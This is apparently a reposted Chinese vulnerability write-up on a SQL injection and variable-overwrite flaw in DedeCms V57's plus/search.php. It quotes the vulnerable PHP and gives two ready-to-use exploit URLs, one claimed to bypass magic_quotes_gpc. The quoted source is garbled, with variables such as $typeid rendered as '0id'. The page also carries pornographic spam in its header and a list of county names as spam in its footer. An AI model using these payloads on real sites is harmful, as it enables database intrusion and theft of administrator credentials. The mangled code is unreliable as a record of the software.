亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

DedeCms V57 plus/search.php文件SQL注射

發布時間:2020-06-16 13:49:40 來源:網絡 閱讀:942 作者:aaccee12 欄目:web開發

微博上看到就分析了一下,這個漏洞不止一處地方可以被利用.其實可以無視magic_quotes_gpc = On的時候.真心不雞肋.

    作者: c4rp3nt3r@0x50sec.org

    Dedecms最新版 plus/search.php 文件存在變量覆蓋漏洞,成功利用該漏洞可以獲取管理員密碼.

    黑哥說漏洞已補.怪我沒有測試好.也沒用這個黑站…不過這個漏洞真心不錯,應該有一定利用價值.標題就不改了,補了就公開了吧.

    ============

    Dedecms最新版 plus/search.php 文件存在變量覆蓋漏洞,成功利用該漏洞可以獲取管理員密碼.

   

  1. require_once(dirname(__FILE__).”/../include/common.inc.php”);

  2. require_once(DEDEINC.”/arc.searchview.class.php”);


  3. $pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;

  4. 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0;

  5. $channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;

  6. $kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;

  7. $mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;


  8. if(!isset($orderby)) $orderby=”;

  9. else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);



  10. if(!isset($searchtype)) $searchtype = ‘titlekeyword’;

  11. else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);


  12. if(!isset($keyword)){

  13. if(!isset($q)) $q = ”;

  14. $keyword=$q;

  15. }


  16. $oldkeyword = $keyword = FilterSearch(stripslashes($keyword));


  17. //查找欄目信息

  18. if(empty(0id))

  19. {

  20. 0nameCacheFile = DEDEDATA.’/cache/typename.inc’;

  21. if(!file_exists(0nameCacheFile) || filemtime(0nameCacheFile) < time()-(3600*24) )

  22. {

  23. $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);

  24. fwrite($fp, “<”.”?php\r\n”);

  25. $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);

  26. $dsql->Execute();

  27. while($row = $dsql->GetArray())

  28. {

  29. fwrite($fp, “\0Arr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);

  30. }

  31. fwrite($fp, ‘?’.'>’);

  32. fclose($fp);

  33. }

  34. //引入欄目緩存并看關鍵字是否有相關欄目內容

  35. require_once(0nameCacheFile);

  36. //0Arr這個數組是包含生成的臨時文件 里面定義的,由于dedecms的全局變量機制,我們可以自己定義一個

  37. //

  38. if(isset(0Arr) && is_array(0Arr))

  39. {

  40. foreach(0Arr as $id=>0name)

  41. {


  42. $keywordn = str_replace(0name, ‘ ‘, $keyword);  //這個地方要繞過

  43. if($keyword != $keywordn)

  44. {

  45. $keyword = $keywordn;

  46. 0id = $id; // 這里存在變量覆蓋漏洞使 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0; 這句過濾成了擺設

  47. break;

  48. }

  49. }

  50. }

  51. }


    然后plus/search.php文件下面定義了一個 Search類的對象 .

    在arc.searchview.class.php 文件的SearchView類的構造函數 聲明了一個TypeLink類.

    $this->TypeLink = new TypeLink(0id);

    TypeLink類的構造函數沒有經過過濾,(程序員以為前面已經過濾過了… )直接帶入了sql語句.

   

  1. class TypeLink

  2. {

  3. var 0Dir;

  4. var $dsql;

  5. var $TypeID;

  6. var $baseDir;

  7. var $modDir;

  8. var $indexUrl;

  9. var $indexName;

  10. var $TypeInfos;

  11. var $SplitSymbol;

  12. var $valuePosition;

  13. var $valuePositionName;

  14. var $OptionArrayList;


  15. //構造函數///////

  16. //php5構造函數

  17. function __construct(0id)

  18. {

  19. $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];

  20. $this->indexName = $GLOBALS['cfg_indexname'];

  21. $this->baseDir = $GLOBALS['cfg_basedir'];

  22. $this->modDir = $GLOBALS['cfg_templets_dir'];

  23. $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];

  24. $this->dsql = $GLOBALS['dsql'];

  25. $this->TypeID = 0id;

  26. $this->valuePosition = ”;

  27. $this->valuePositionName = ”;

  28. $this->typeDir = ”;

  29. $this->OptionArrayList = ”;


  30. //載入類目信息


  31. $query = “SELECT tp.*,ch.typename as

  32. ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join

  33. `#@__channeltype` ch

  34. on ch.id=tp.channeltype  WHERE tp.id=’0id’ “; //注射漏洞發生在這里,很明顯需要magic_quotes_gpc = Off 雞肋了嗎?好可以吧至少不需要會員中心阿


  35. if(0id > 0)

  36. {

  37. $this->TypeInfos = $this->dsql->GetOne($query);


    利用代碼一 需要 即使magic_quotes_gpc = Off

    http:// /plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

    這只是其中一個利用代碼… Search 類的構造函數再往下

   

  1. ……省略

  2. $this->TypeID = 0id;

  3. ……省略

  4. if($this->TypeID==”0″){

  5. $this->ChannelTypeid=1;

  6. }else{

  7. $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //這里的注入漏洞無視magic_quotes_gpc = On的存在哦親

  8. //現在不雞肋了吧親…

  9. $this->ChannelTypeid=$row['channeltype'];


  10. }


    利用代碼二,下面這個EXP 即使magic_quotes_gpc = On 也可以成功利用.

    http:// /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

    如果那個數據庫里存在內容,就要考慮的復雜點了.我也沒考慮那么周全,分析了下然后簡單測試了下,也沒用來黑站


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

胶州市| 太谷县| 长海县| 惠安县| 保康县| 平山县| 金堂县| 莱州市| 丰原市| 新建县| 仁化县| 墨玉县| 德清县| 济阳县| 黔西县| 宝坻区| 忻州市| 盖州市| 无为县| 清丰县| 新兴县| 江门市| 分宜县| 波密县| 海南省| 鹤峰县| 五原县| 彩票| 安塞县| 太白县| 平乡县| 九江县| 西盟| 墨竹工卡县| 颍上县| 张家口市| 彭阳县| 双峰县| 永吉县| 英德市| 兴文县|